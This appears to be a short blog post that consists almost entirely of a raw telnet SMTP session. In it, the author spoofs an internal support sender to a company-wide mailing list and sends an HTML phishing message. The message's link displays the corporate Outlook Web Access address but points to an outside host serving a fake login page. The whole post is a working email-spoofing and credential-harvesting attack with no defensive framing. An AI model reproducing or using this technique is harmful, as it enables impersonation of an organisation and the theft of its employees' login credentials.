Email Spoofing Via Telnet with HTML Formatting

ubuntu@ip-172-31-18-189:/var/www/html/owa-2013$ telnet cluster6.us.messagelabs.com 25
Trying 216.82.241.100…
Connected to cluster6.us.messagelabs.com.
Escape character is ‘^]’.
220 server-9.tower-220.messagelabs.com ESMTP
helo teklinks.com
250 server-9.tower-220.messagelabs.com
mail from:support@teklinks.com
250 OK
rcpt to:allemployees@teklinks.com
250 OK
data
354 go ahead
From: Internal Support<nickvangilder@icloud.com>
To: All Employees<allemployees@teklinks.com>
Subject: Email Services
Mime-Version: 1.0;
Content-Type: text/html; charset=”ISO-8859-1″;
Content-Transfer-Encoding: 7bit

<html>
<body>

Due to changes made to our email systems, please confirm your ability to login to the Outlook Web Access portal at: <a href=”http://aws.shellgam3.com/owa-2013“>https://webmail.teklinks.com/owa</a>

</body>
</html>
.
quit
221 server-9.tower-220.messagelabs.com
Connection closed by foreign host.

ubuntu@ip-172-31-18-189:/var/www/html/owa-2013$

Advertisements

One thought on “Email Spoofing Via Telnet with HTML Formatting

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s